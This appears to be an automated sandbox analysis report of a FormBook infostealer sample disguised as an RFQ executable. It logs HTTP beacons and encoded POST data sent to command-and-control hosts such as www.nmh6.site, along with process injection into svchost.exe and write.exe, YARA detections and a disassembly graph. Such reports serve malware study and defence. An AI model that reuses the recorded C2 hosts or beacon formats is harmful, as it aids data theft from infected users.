                                                      Data Ascii: N0spilI0=3RKIN8ruKXiYQ+T8aW7X18AMbzQwmjsLXwCHKgbNBIfaT3ydpCyc0erzS2CWR4TfYNp5lO8pEnpSDVJoVMhQ8Ks1OV3+u5d85e1kYATOv3vc4a2KM9R9aeKar625/FNYMFasXmf6x+7dGUvdv9jrpolodK3YrO2Rnfj1TqOVzgqm3W1OWCf3k64YTx5E/+sHlY0zlNr2rB5sfMjQBzNnZwnjbQKLqzWFEpk2cht6GdNADsWOjXbrpHQSVwS7nO7GKxAUgkGJ6WV2XSdm4Jiu6Cwsps7tU49RicauS7ZDgFgfJ4BjrhUEJCZei/rHcnNKBKXjizxfA9dTJVNcxNnWmisYtLbDgieZ81MfSdZw9foFC0baGSLfOLtrAvW34nFR+8/+ZzCro6RkiWuWDjhztIpgMAYnZI4/szGvrJfA40BulBdboWJP1CkVNIGjJcrH3W/LiEe6Pg2FXD1NJ+UjHmNtj3RvdP3K6a1ZSEN2nM2UMKl9Fh/YhBtACGBshSiJhCClqZNv2vUxf0BpirUAnSAmacWQotCujKpr4VYx9i5saEQXT+Oq4/aih0imVV/cpO0AFzjAsgohgFaE4nKI2aPuUMt3c6tzJXgl1rWqhU8Q3sf5MgH0XEkom9EYQ/JbnwlUjjuGLA4RhFrkOBM6usLWxCU9FogQVREKXI169gVr4Ho4j35dFxvChH9143N2GGU1Z1IXDzHUEaIuXc33sDYj4kmUG7gr+igCgZaJbskBaEc+bhIOAYnLc6HLRX/J8ODzSSrSrXlf1ox2b5HycfhQV6UAxm7LWXnX53EpwJMJMrDi0MLUGccmc/N64c6cQJVrjBxbb2sf+4mkYB9VPKqY6cBHFYrvt7DxsjLJ3BEuy9EPeFL6SLs/kGBCLa/vJdF20+DhXpSejMUgZ+tn/8cxORPegHl6J9ZtA7P6WyOovP74p2UnGk2QNLbzeE7T/p7OaTAX2aFMXJu58CryMWhG1guu2G8NbEIWpusvhkq [TRUNCATED]
                                                      Sep 25, 2024 05:38:42.801974058 CEST1033INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 25 Sep 2024 03:38:42 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.449781198.252.106.19180600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:44.779187918 CEST473OUTGET /4est/?N0spilI0=6TioOITzTznuWaHFY2nP+M5OXgMojRQqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXgac9EFud27M13v05UDH3lX7bp5CeFPtRd9M=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.suarahati20.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:38:45.354216099 CEST1033INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 25 Sep 2024 03:38:45 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.44978243.154.104.24780600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:50.918225050 CEST721OUTPOST /8qne/ HTTP/1.1
                                                      Host: www.nmh6.site
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.nmh6.site
                                                      Referer: http://www.nmh6.site/8qne/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 31 67 4d 68 34 63 45 76 2b 6b 43 30 4e 69 70 51 48 4b 76 5a 4f 4e 42 6d 43 54 42 57 45 6f 68 6c 35 4f 42 71 58 6d 52 2b 65 50 34 59 42 2f 78 35 35 51 45 71 5a 74 37 4f 54 44 49 41 6f 42 4e 4e 33 78 7a 33 45 73 39 6f 42 72 7a 6e 64 67 4a 65 78 58 7a 46 5a 59 58 78 41 74 37 65 55 4c 36 6d 66 4a 5a 41 35 76 63 53 55 52 4c 53 73 5a 47 41 35 4a 75 70 4d 6b 30 7a 4e 33 75 70 4f 72 71 39 53 4a 58 73 53 43 74 34 68 75 37 33 2f 58 36 45 47 70 47 4f 6d 50 2f 66 48 51 37 71 4f 61 36 70 48 6a 5a 72 36 54 6f 4b 2b 44 36 64 43 6f 51 37 4a 64 50 75 67 3d 3d
                                                      Data Ascii: N0spilI0=HRrrDXRntJoN31gMh4cEv+kC0NipQHKvZONBmCTBWEohl5OBqXmR+eP4YB/x55QEqZt7OTDIAoBNN3xz3Es9oBrzndgJexXzFZYXxAt7eUL6mfJZA5vcSURLSsZGA5JupMk0zN3upOrq9SJXsSCt4hu73/X6EGpGOmP/fHQ7qOa6pHjZr6ToK+D6dCoQ7JdPug==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.44978343.154.104.24780600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:53.470298052 CEST741OUTPOST /8qne/ HTTP/1.1
                                                      Host: www.nmh6.site
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.nmh6.site
                                                      Referer: http://www.nmh6.site/8qne/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 56 51 4d 6b 5a 63 45 71 65 6b 4e 78 4e 69 70 43 48 4b 72 5a 4f 42 42 6d 44 6e 72 57 57 63 68 6d 62 6d 42 72 57 6d 52 2f 65 50 34 54 68 2f 30 33 5a 51 66 71 5a 70 7a 4f 54 50 49 41 6f 56 4e 4e 31 70 7a 32 33 30 36 72 78 72 31 76 39 67 50 42 68 58 7a 46 5a 59 58 78 42 49 67 65 56 6a 36 6d 4c 31 5a 53 59 76 66 66 30 52 4d 52 73 5a 47 52 4a 4a 71 70 4d 6b 47 7a 4d 72 58 70 4d 6a 71 39 58 74 58 73 44 43 71 78 68 75 69 71 76 57 61 4e 55 67 57 4b 32 4f 54 59 33 59 62 71 4d 32 4d 68 68 79 44 36 4c 79 2f 59 2b 6e 4a 41 46 68 6b 32 4b 67 47 31 6e 33 75 77 38 6e 32 38 54 58 6c 6e 75 72 39 42 34 54 78 39 36 59 3d
                                                      Data Ascii: N0spilI0=HRrrDXRntJoN3VQMkZcEqekNxNipCHKrZOBBmDnrWWchmbmBrWmR/eP4Th/03ZQfqZpzOTPIAoVNN1pz2306rxr1v9gPBhXzFZYXxBIgeVj6mL1ZSYvff0RMRsZGRJJqpMkGzMrXpMjq9XtXsDCqxhuiqvWaNUgWK2OTY3YbqM2MhhyD6Ly/Y+nJAFhk2KgG1n3uw8n28TXlnur9B4Tx96Y=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.44978443.154.104.24780600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:56.020057917 CEST10823OUTPOST /8qne/ HTTP/1.1
                                                      Host: www.nmh6.site
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.nmh6.site
                                                      Referer: http://www.nmh6.site/8qne/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 56 51 4d 6b 5a 63 45 71 65 6b 4e 78 4e 69 70 43 48 4b 72 5a 4f 42 42 6d 44 6e 72 57 57 6b 68 6d 71 47 42 72 78 61 52 34 65 50 34 51 68 2f 31 33 5a 51 65 71 5a 52 33 4f 54 7a 79 41 72 74 4e 4d 57 68 7a 78 47 30 36 77 68 72 31 6a 64 67 4b 65 78 58 71 46 5a 49 54 78 42 59 67 65 56 6a 36 6d 4e 52 5a 45 35 76 66 4d 45 52 4c 53 73 5a 53 41 35 49 39 70 4d 39 7a 7a 4d 66 48 70 64 44 71 2b 33 64 58 6a 52 71 71 74 78 75 33 70 76 57 34 4e 55 39 4d 4b 32 43 70 59 32 63 39 71 4e 4f 4d 6b 6e 6a 6b 74 72 6d 70 4b 63 76 70 58 47 39 48 2f 36 34 44 37 58 43 54 34 35 79 70 68 43 58 56 71 74 36 51 45 4a 66 35 70 73 58 6b 6a 7a 59 43 56 77 2b 4a 4b 30 50 33 2f 48 57 76 64 51 5a 48 50 6b 45 58 6f 57 67 4b 62 74 5a 39 62 67 4e 51 44 75 78 48 62 4e 73 38 43 62 4b 32 30 62 37 34 64 66 46 33 54 78 73 37 58 54 50 58 43 62 42 39 34 42 78 38 76 62 36 30 65 58 33 47 74 4d 4f 4a 62 46 31 75 35 43 47 4a 52 45 76 52 77 66 33 43 32 4a 6d 61 55 72 71 38 68 43 6e 6c 67 [TRUNCATED]
                                                      Data Ascii: N0spilI0=HRrrDXRntJoN3VQMkZcEqekNxNipCHKrZOBBmDnrWWkhmqGBrxaR4eP4Qh/13ZQeqZR3OTzyArtNMWhzxG06whr1jdgKexXqFZITxBYgeVj6mNRZE5vfMERLSsZSA5I9pM9zzMfHpdDq+3dXjRqqtxu3pvW4NU9MK2CpY2c9qNOMknjktrmpKcvpXG9H/64D7XCT45yphCXVqt6QEJf5psXkjzYCVw+JK0P3/HWvdQZHPkEXoWgKbtZ9bgNQDuxHbNs8CbK20b74dfF3Txs7XTPXCbB94Bx8vb60eX3GtMOJbF1u5CGJREvRwf3C2JmaUrq8hCnlgW4USMz9QTaXZpfqiw3JMqDowfC42KfClvEzGtwe/U8oyGsLRA53HALJDm2ZdIz6vuF7IYQ7a+ZN3IlBzJAccp6GMjwa9l9pDdOmdEtJdvxq5K2fbtcRXBKcUWV9BBwX3m8yWZQHPxYhi5AbOf5rjFNGpIwm+KmzhEu9bxCzA+UVK2KIwW3uOZsHpZ0X93pledmgJly8NWbfRYnuwisW1wCEd35cymVr72LQb7tskzvQglXNCQvUTpxYmUyoN5CGW8bDzFYs/4HebEfeVcOZr2MLugNCXO/Nrt29/68RltYAsctaxDWupVy2OvBPCPJjNZitxGsD+VZYyWdSw7oo0osui+uEBl7mXY1mXzaYHkpV4WfTltBVQfBbPFBs2qU8BJHwHa/3cgTNdUDz2bIU4HEq8Fwg2W/5sZtKXM7bd7dPOt4OzZMN55rcdEGko+ro62hH+l9muN991muAnTuR0QESHhMT3qg9J6bzoljKczAqK+Q3/il2V9V2KVeUIgDB7n/TJDSUzN+g21s8y8Pt+z0x+zNeCGOkbQe5FIiXheCm8PrjcGDDq30HKDcs5A90LDOBgUOclJpKNY6Z7D7Ufj8N2XL0KAzlVGyUrUkzVh5Gv2by1wUe3UdpFipHCEZAHyrTe/Itb/Q39vnEP4gBYog4UVWGIMFQX9N [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.44978543.154.104.24780600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:58.557384014 CEST467OUTGET /8qne/?N0spilI0=KTDLAip6979182Yus4gak8cu0ouPK1SjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdc2yH6m+FOGHStPZpUzCEofUPNgN9qGZfSYG8=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.nmh6.site
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:23:34:59
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"
                                                      Imagebase:0x400000
                                                      File size:1'360'461 bytes
                                                      MD5 hash:8CD57235A1BA838DF14C6A67AD2048D0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:23:35:02
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"
                                                      Imagebase:0x1a0000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:23:35:37
                                                      Start date:24/09/2024
                                                      Path:C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe"
                                                      Imagebase:0x980000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:6
                                                      Start time:23:35:39
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\SysWOW64\write.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\write.exe"
                                                      Imagebase:0xa50000
                                                      File size:10'240 bytes
                                                      MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:7
                                                      Start time:23:35:52
                                                      Start date:24/09/2024
                                                      Path:C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe"
                                                      Imagebase:0x980000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:8
                                                      Start time:23:36:04
                                                      Start date:24/09/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff6bf500000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                        Signature Coverage:8.8%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:36
                                                        execution_graph 84320 4010e0 84323 401100 84320->84323 84322 4010f8 84324 401113 84323->84324 84325 401182 84324->84325 84327 401120 84324->84327 84328 401184 84324->84328 84329 40114c 84324->84329 84326 40112c DefWindowProcW 84325->84326 84326->84322 84327->84326 84382 401000 Shell_NotifyIconW __call_reportfault 84327->84382 84361 401250 84328->84361 84330 401151 84329->84330 84331 40119d 84329->84331 84333 401219 84330->84333 84334 40115d 84330->84334 84336 4011a3 84331->84336 84337 42afb4 84331->84337 84333->84327 84340 401225 84333->84340 84338 401163 84334->84338 84339 42b01d 84334->84339 84335 401193 84335->84322 84336->84327 84346 4011b6 KillTimer 84336->84346 84347 4011db SetTimer RegisterWindowMessageW 84336->84347 84377 40f190 10 API calls 84337->84377 84343 42afe9 84338->84343 84344 40116c 84338->84344 84339->84326 84381 4370f4 52 API calls 84339->84381 84393 468b0e 74 API calls __call_reportfault 84340->84393 84379 40f190 10 API calls 84343->84379 84344->84327 84350 401174 84344->84350 84345 42b04f 84383 40e0c0 84345->84383 84376 401000 Shell_NotifyIconW __call_reportfault 84346->84376 84347->84335 84348 401204 CreatePopupMenu 84347->84348 84348->84322 84378 45fd57 65 API calls __call_reportfault 84350->84378 84355 42afe4 84355->84335 84356 42b00e 84380 401a50 331 API calls 84356->84380 84357 4011c9 PostQuitMessage 84357->84322 84360 42afdc 84360->84326 84360->84355 84362 4012e8 84361->84362 84363 401262 __call_reportfault 84361->84363 84362->84335 84394 401b80 84363->84394 84365 40128c 84366 4012d1 KillTimer SetTimer 84365->84366 84367 4012bb 84365->84367 84368 4272ec 84365->84368 84366->84362 84371 4012c5 84367->84371 84372 42733f 84367->84372 84369 4272f4 Shell_NotifyIconW 84368->84369 84370 42731a Shell_NotifyIconW 84368->84370 84369->84366 84370->84366 84371->84366 84375 427393 Shell_NotifyIconW 84371->84375 84373 427348 Shell_NotifyIconW 84372->84373 84374 42736e Shell_NotifyIconW 84372->84374 84373->84366 84374->84366 84375->84366 84376->84357 84377->84335 84378->84360 84379->84356 84380->84325 84381->84325 84382->84345 84385 40e0e7 __call_reportfault 84383->84385 84384 40e142 84390 40e184 84384->84390 84492 4341e6 63 API calls __wcsicoll 84384->84492 84385->84384 84386 42729f DestroyIcon 84385->84386 84386->84384 84388 40e1a0 Shell_NotifyIconW 84391 401b80 54 API calls 84388->84391 84389 4272db Shell_NotifyIconW 84390->84388 84390->84389 84392 40e1ba 84391->84392 84392->84325 84393->84355 84395 401b9c 84394->84395 84415 401c7e 84394->84415 84416 4013c0 84395->84416 84398 42722b LoadStringW 84401 427246 84398->84401 84399 401bb9 84421 402160 84399->84421 84435 40e0a0 84401->84435 84402 401bcd 84404 427258 84402->84404 84405 401bda 84402->84405 84439 40d200 52 API calls 2 library calls 84404->84439 84405->84401 84406 401be4 84405->84406 84434 40d200 52 API calls 2 library calls 84406->84434 84409 427267 84410 42727b 84409->84410 84412 401bf3 _wcscpy __call_reportfault _wcsncpy 84409->84412 84440 40d200 52 API calls 2 library calls 84410->84440 84414 401c62 Shell_NotifyIconW 84412->84414 84413 427289 84414->84415 84415->84365 84441 4115d7 84416->84441 84422 426daa 84421->84422 84423 40216b _wcslen 84421->84423 84479 40c600 84422->84479 84426 402180 84423->84426 84427 40219e 84423->84427 84425 426db5 84425->84402 84478 403bd0 52 API calls moneypunct 84426->84478 84429 4013a0 52 API calls 84427->84429 84431 4021a5 84429->84431 84430 426db7 84431->84430 84433 4115d7 52 API calls 84431->84433 84432 402187 _memmove 84432->84402 84433->84432 84434->84412 84436 40e0b2 84435->84436 84437 40e0a8 84435->84437 84436->84412 84491 403c30 52 API calls _memmove 84437->84491 84439->84409 84440->84413 84443 4115e1 _malloc 84441->84443 84444 4013e4 84443->84444 84445 4115fd std::exception::exception 84443->84445 84455 4135bb 84443->84455 84452 4013a0 84444->84452 84450 41163b 84445->84450 84469 41130a 51 API calls __cinit 84445->84469 84447 411645 84471 418105 RaiseException 84447->84471 84470 4180af 46 API calls std::exception::operator= 84450->84470 84451 411656 84453 4115d7 52 API calls 84452->84453 84454 4013a7 84453->84454 84454->84398 84454->84399 84456 413638 _malloc 84455->84456 84464 4135c9 _malloc 84455->84464 84477 417f77 46 API calls __getptd_noexit 84456->84477 84459 4135f7 RtlAllocateHeap 84460 413630 84459->84460 84459->84464 84460->84443 84462 4135d4 84462->84464 84472 418901 46 API calls 2 library calls 84462->84472 84473 418752 46 API calls 7 library calls 84462->84473 84474 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84462->84474 84463 413624 84475 417f77 46 API calls __getptd_noexit 84463->84475 84464->84459 84464->84462 84464->84463 84467 413622 84464->84467 84476 417f77 46 API calls 